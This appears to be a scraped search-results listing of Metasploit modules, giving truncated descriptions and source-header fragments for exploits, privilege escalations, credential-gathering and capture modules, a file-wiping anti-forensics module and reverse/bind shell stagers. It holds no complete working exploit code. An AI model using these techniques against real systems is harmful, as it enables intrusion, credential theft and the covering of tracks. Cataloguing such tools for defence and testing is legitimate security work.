6843 matches found
Lantronix Telnet Password Recovery
This module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port 30718/udp, enabled by default and extracts the telnet password. It has been tested successfully on a Lantronix Device Server with software version V5.8.0.1. This module requires Metasploit:...
AjaXplorer checkInstall.php Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...
Project Pier Arbitrary File Upload Vulnerability
This module exploits a vulnerability found in Project Pier. The application's uploading tool does not require any authentication, which allows a malicious user to upload an arbitrary file onto the web server, and then cause remote code execution by simply requesting it. This module is known to wo...
KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
This module exploits a code execution vulnerability in the KeyScript ActiveX control from keyhelp.ocx. It is packaged in several products or GE, such as Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver...
Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution
This module exploits an authentication bypass vulnerability on Avaya IP Office Customer Call Reporter, which allows a remote user to upload arbitrary files through the ImageUpload.ashx component. It can be abused to upload and execute arbitrary ASP .NET code. The vulnerability has been tested...
PhpTax pfilez Parameter Exec Remote Code Injection
This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng function in drawimage.php does not properly handle the pfilez parameter, which will be used in an exec statement, and then results in arbitrary remote code execution under...
Avaya WinPMD UniteHostRouter Buffer Overflow
This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability exists in the UniteHostRouter service, due to the insecure usage of memcpy when parsing specially crafted "To:" headers. The module has been tested successfully on Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 20...
Windows Escalate UAC Execute RunAs
This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Escalate U...
InduSoft Web Studio Arbitrary Upload Remote Code Execution
This module exploits a lack of authentication and authorization on the InduSoft Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to the filesystem, by abusing the functions provided by the software. The module uses the Windows Management Instrumentation service to...
Multi Gather GnuPG Credentials Collection
This module will collect the contents of all users' .gnupg directories on the targeted machine. Password protected secret keyrings can be cracked with John the Ripper JtR. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framewo...
Authentication Capture: PostgreSQL
This module provides a fake PostgreSQL service that is designed to capture clear-text authentication credentials. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Authentication Capture:...
Windows Manage Safe Delete
The goal of the module is to hinder the recovery of deleted files by overwriting its contents. This could be useful when you need to download some file on the victim machine and then delete it without leaving clues about its contents. Note that the script does not wipe the free disk space so...
QNX qconn Command Execution
This module uses the qconn daemon on QNX systems to gain a shell. The QNX qconn daemon does not require authentication and allows remote users to execute arbitrary operating system commands. This module has been tested successfully on QNX Neutrino 6.5.0 x86 and 6.5.0 SP1 x86...
Windows Gather Apache Tomcat Enumeration
This module will collect information from a Windows-based Apache Tomcat. You will get information such as: The installation path, Tomcat version, port, web applications, users, passwords, roles, etc. This module requires Metasploit: https://metasploit.com/download Current source:...
Samba SetInformationPolicy AuditEventsInfo Heap Overflow
This module triggers a vulnerability in the LSA RPC service of the Samba daemon because of an error on the PIDL auto-generated code. Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to trigger a heap overflow and finally execute arbitrary code...
Indusoft WebStudio NTWebServer Remote File Access
This module exploits a directory traversal vulnerability in Indusoft WebStudio. The vulnerability exists in the NTWebServer component and allows to read arbitrary remote files with the privileges of the NTWebServer process. The module has been tested successfully on Indusoft WebStudio 6.1 SP6. Th...
Dell iDRAC Default Login
This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access Controller 6 - Express version 1.50 and 1.85, Controller 7 - Enterprise 2.63.60.62 Controller 8 - Enterprise 2.83.05 Controller 9 - Enterprise 4.40.00.00 This module...
MS11-080 AfdJoinLeaf Privilege Escalation
This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then...
phpMyAdmin 3.5.2.2 server_sync.php Backdoor
This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'phpMyAdmin...
Auxilium RateMyPet Arbitrary File Upload Vulnerability
This module exploits a vulnerability found in Auxilium RateMyPet's. The site banner uploading feature can be abused to upload an arbitrary file to the web server, which is accessible in the 'banner' directory, thus allowing remote code execution. This module requires Metasploit:...
HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution
This module exploits a vulnerability within the XGO.ocx ActiveX Control installed with the HP Application Lifecycle Manager Client. The vulnerability exists in the SetShapeNodeType method, which allows the user to specify memory that will be used as an object, through the node parameter. It allow...
HTTP Client Automatic Exploiter
This module has three actions. The first and the default is 'WebServer' which uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. Next is 'DefangedDetection' which does only the fingerprinting part. Lastly, 'list' simply...
OS X x64 say Shellcode
Say an arbitrary string outloud using Mac OS X text2speech This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 53 include Msf::Payload::Single def initializeinfo = supermergeinfoinfo,...
OSX Meterpreter, Reverse TCP Stager
Inject the mettle server payload staged. Connect, read length, read buffer, execute This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 168 include Msf::Payload::Osx::ReverseTcpx64...
OS X dup2 Command Shell, Reverse TCP Stager
dup2 socket in edi, then execve. Connect, read length, read buffer, execute This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 168 include Msf::Payload::Osx::ReverseTcpx64 include...
OSX Meterpreter, Bind TCP Stager
Inject the mettle server payload staged. Listen, read length, read buffer, execute This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 185 include Msf::Payload::Stager def initializein...
OS X dup2 Command Shell, Bind TCP Stager
dup2 socket in edi, then execve. Listen, read length, read buffer, execute This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 185 include Msf::Payload::Stager def initializeinfo =...
OSX Command Shell, Find Tag Inline
Spawn a shell on an established connection proxy/nat safe This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 107 include Msf::Payload::Single include Msf::Payload::Osx include...
Windows Gather Database Instance Enumeration
This module will enumerate a windows system for installed database instances This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Database Instance Enumeration', 'Description' = %q Th...
ZEN Load Balancer Filelog Command Execution
This module exploits a vulnerability in ZEN Load Balancer version 2.0 and 3.0-rc1 which could be abused to allow authenticated users to execute arbitrary code under the context of the 'root' user. The 'content2-2.cgi' file uses user controlled data from the 'filelog' parameter within backticks...
NTR ActiveX Control Check() Method Buffer Overflow
This module exploits a vulnerability found in NTR ActiveX 1.1.8. The vulnerability exists in the Check method, due to the insecure usage of strcat to build a URL using the bstrParams parameter contents note: this is also the reason why the module won't allow you to modify the URIPATH, which leads...
NTR ActiveX Control StopModule() Remote Code Execution
This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The vulnerability exists in the StopModule method, where the lModule parameter is used to dereference memory to get a function pointer, which leads to code execution under the context of the user visiting a malicious web page...
Printjob Capture Service
This module is designed to listen for PJL or PostScript print jobs. Once a print job is detected it is saved to loot. The captured printjob can then be forwarded on to another printer required for LPR printjobs. Resulting PCL/PS files can be read with GhostScript/GhostPCL. Note, this module does...
OS X x64 Shell Bind TCP
Bind an arbitrary command to an arbitrary port This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 136 include Msf::Payload::Single include Msf::Payload::Osx include...
OS X x64 Shell Reverse TCP
Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 128 include Msf::Payload::Single include Msf::Payload::Osx include...
MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
This module exploits a vulnerability found in Microsoft Internet Explorer MSIE. When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec function, leading to a use-after-free condition. Please note tha...
Webmin /file/show.cgi Remote Command Execution
This module exploits an arbitrary command execution vulnerability in Webmin 1.580. The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary commands with root privileges. The module has been tested...
Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
This module exploits a directory traversal in Webmin 1.580. The vulnerability exists in the edithtml.cgi component and allows an authenticated user with access to the File Manager Module to access arbitrary files with root privileges. The module has been tested successfully with Webmin 1.580 over...
Oracle Business Transaction Management FlashTunnelService Remote Code Execution
This module exploits abuses the FlashTunnelService SOAP web service on Oracle Business Transaction Management 12.1.0.7 to upload arbitrary files, without authentication, using the WriteToFile method. The same method contains a directory traversal vulnerability, which allows to upload the files to...
Linux Command Shell, Bind TCP Stager
Spawn a command shell staged. Listen for a connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework BindTcp ------- Linux bind TCP stager. module MetasploitModule CachedSize = 63 include Msf::Payload::Stager include...
Linux Mettle x86, Bind TCP Stager
Inject the mettle server payload staged. Listen for a connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework BindTcp ------- Linux bind TCP stager. module MetasploitModule CachedSize = 63 include...
Linux Mettle x86, Reverse TCP Stager
Inject the mettle server payload staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework ReverseTcp ---------- Linux reverse TCP stager. module MetasploitModule CachedSize = 50 include...
Linux Command Shell, Reverse TCP Stager
Spawn a command shell staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework ReverseTcp ---------- Linux reverse TCP stager. module MetasploitModule CachedSize = 50 include...
Novell File Reporter Agent Arbitrary File Delete
NFRAgent.exe in Novell File Reporter allows remote attackers to delete arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR Agent 1.0.4.3 File Reporter 1.0.2 and NFR Agent 1.0.3.22 File...
qdPM v7 Arbitrary PHP File Upload Vulnerability
This module exploits a vulnerability found in qdPM - a web-based project management software. The user profile's photo upload feature can be abused to upload any arbitrary file onto the victim server machine, which allows remote code execution. Please note in order to use this module, you must ha...
Free Float FTP Server USER Command Buffer Overflow
Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact. This module requires Metasploit:...
Apple iOS MobileMail LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. This module requires Metasploit: https://metasploit.com/download...
Apple iOS MobileSafari LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. This module requires Metasploit: https://metasploit.com/download...
Linux udev Netlink Local Privilege Escalation
Versions of udev 'Linux udev Netlink Local Privilege Escalation', 'Description' = %q Versions of udev MSFLICENSE, 'Author' = 'kcope', discovery 'Jon Oberheide', 95-udev-late.rules technique 'egypt' metasploit module , 'Platform' = 'linux' , 'Arch' = ARCHX86, ARCHX64 , 'SessionTypes' = 'shell',...
Winamp MAKI Buffer Overflow
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the genff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user controlled data. To exploit the vulnerability the attacker must convince the victim to...